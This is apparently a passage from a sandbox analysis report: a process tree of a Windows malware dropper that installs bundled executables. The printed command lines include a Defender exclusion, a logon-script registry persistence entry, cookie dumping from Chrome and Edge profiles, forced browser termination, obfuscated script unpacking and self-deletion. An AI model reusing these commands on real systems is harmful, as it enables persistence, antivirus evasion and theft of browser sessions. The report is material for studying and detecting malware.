                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3768
                                                                                  • C:\Users\Admin\Documents\x4fXd2QaV0v_TeU7DthMnPvH.exe
                                                                                    "C:\Users\Admin\Documents\x4fXd2QaV0v_TeU7DthMnPvH.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:392
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 660
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5016
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 676
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2860
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 680
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4420
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 716
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5272
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 1124
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5016
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 1156
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5296
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 1148
                                                                                      3⤵
                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                      • Program crash
                                                                                      PID:5080
                                                                                  • C:\Users\Admin\Documents\gJzdY7NyA7eltvk9UMBg785Z.exe
                                                                                    "C:\Users\Admin\Documents\gJzdY7NyA7eltvk9UMBg785Z.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1240
                                                                                  • C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe
                                                                                    "C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2292
                                                                                    • C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe
                                                                                      C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4936
                                                                                  • C:\Users\Admin\Documents\Frk049L8RP7us5CoG7pqiM61.exe
                                                                                    "C:\Users\Admin\Documents\Frk049L8RP7us5CoG7pqiM61.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1212
                                                                                  • C:\Users\Admin\Documents\xjuPS_F3XQkeechcDPqUclSq.exe
                                                                                    "C:\Users\Admin\Documents\xjuPS_F3XQkeechcDPqUclSq.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:484
                                                                                  • C:\Users\Admin\Documents\rbrR9su3TdP347pwc5jtrSx5.exe
                                                                                    "C:\Users\Admin\Documents\rbrR9su3TdP347pwc5jtrSx5.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Program Files directory
                                                                                    PID:3308
                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4696
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5860
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:968
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5872
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5656
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -u -p 4696 -s 768
                                                                                        4⤵
                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                        • Program crash
                                                                                        PID:5312
                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      • Drops file in Program Files directory
                                                                                      PID:4608
                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4580
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:200
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                  1⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4880
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-LPQDD.tmp\Setup.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-LPQDD.tmp\Setup.exe" /Verysilent
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:2232
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4860
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 760
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:1168
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 812
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:6412
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 784
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:6836
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 824
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:6252
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3680
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-6QLEK.tmp\Inlog.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-6QLEK.tmp\Inlog.tmp" /SL5="$20296,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:4776
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-EL2P3.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-EL2P3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                        4⤵
                                                                                          PID:5760
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-7G82B.tmp\Setup.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-7G82B.tmp\Setup.tmp" /SL5="$5026A,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-EL2P3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                            5⤵
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in Program Files directory
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:6436
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-NLFHS.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                              6⤵
                                                                                                PID:6756
                                                                                                • C:\Windows\SysWOW64\expand.exe
                                                                                                  expand C:\Users\Admin\AppData\Local\Temp\is-NLFHS.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                  7⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  PID:7672
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                6⤵
                                                                                                  PID:6440
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    7⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Drops file in Windows directory
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    PID:4992
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                    7⤵
                                                                                                      PID:9128
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                    6⤵
                                                                                                    • Checks computer location settings
                                                                                                    PID:7968
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-NLFHS.tmp\{app}\vdi_compiler.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-NLFHS.tmp\{app}\vdi_compiler"
                                                                                                    6⤵
                                                                                                      PID:1304
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-NLFHS.tmp\{app}\vdi_compiler.exe"
                                                                                                        7⤵
                                                                                                          PID:8356
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping localhost -n 4
                                                                                                            8⤵
                                                                                                            • Runs ping.exe
                                                                                                            PID:7804
                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                        6⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:9196
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Enumerates connected drives
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:4144
                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282274 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                  3⤵
                                                                                                    PID:6404
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4544
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-4VCMF.tmp\WEATHER Manager.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-4VCMF.tmp\WEATHER Manager.tmp" /SL5="$102E2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:5228
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-5BMN5.tmp\Setup.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-5BMN5.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                      4⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Enumerates connected drives
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:6932
                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-5BMN5.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-5BMN5.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282274 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                        5⤵
                                                                                                          PID:7708
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4396
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-KIDID.tmp\VPN.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-KIDID.tmp\VPN.tmp" /SL5="$1030C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:5392
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1J9EA.tmp\Setup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1J9EA.tmp\Setup.exe" /silent /subid=720
                                                                                                        4⤵
                                                                                                          PID:6672
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-8EDR6.tmp\Setup.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-8EDR6.tmp\Setup.tmp" /SL5="$40250,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-1J9EA.tmp\Setup.exe" /silent /subid=720
                                                                                                            5⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Modifies system certificate store
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:7216
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                              6⤵
                                                                                                                PID:5408
                                                                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                  tapinstall.exe remove tap0901
                                                                                                                  7⤵
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  PID:6600
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                6⤵
                                                                                                                  PID:7288
                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                    tapinstall.exe install OemVista.inf tap0901
                                                                                                                    7⤵
                                                                                                                      PID:4992
                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                    6⤵
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:7116
                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                    6⤵
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:9208
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                            2⤵
                                                                                                              PID:4356
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3028
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                3⤵
                                                                                                                  PID:7816
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                    4⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:6104
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5216
                                                                                                                • C:\Users\Admin\AppData\Roaming\5087321.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\5087321.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                  PID:6032
                                                                                                                • C:\Users\Admin\AppData\Roaming\2967354.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\2967354.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:6088
                                                                                                                • C:\Users\Admin\AppData\Roaming\6954772.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\6954772.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2676
                                                                                                                • C:\Users\Admin\AppData\Roaming\3805401.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\3805401.exe"
                                                                                                                  3⤵
                                                                                                                    PID:5536
                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                  2⤵
                                                                                                                    PID:5284
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4404
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5360
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp8B83_tmp.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmp8B83_tmp.exe"
                                                                                                                      3⤵
                                                                                                                        PID:3408
                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                                                          4⤵
                                                                                                                            PID:6396
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                            4⤵
                                                                                                                              PID:6652
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd
                                                                                                                                5⤵
                                                                                                                                  PID:7228
                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                    6⤵
                                                                                                                                      PID:6412
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                      Esplorarne.exe.com i
                                                                                                                                      6⤵
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      PID:4472
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                        7⤵
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:7916
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                          8⤵
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:7912
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            9⤵
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:6768
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                              10⤵
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              PID:5884
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                11⤵
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:7144
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  12⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:8284
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    13⤵
                                                                                                                                                      PID:8788
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        14⤵
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:5840
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          15⤵
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:8632
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            16⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:7428
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              17⤵
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:4872
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                18⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:4740
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  19⤵
                                                                                                                                                                    PID:8572
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      20⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:7612
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        21⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:7044
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:8268
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            23⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:1656
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              24⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:9048
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                25⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:6332
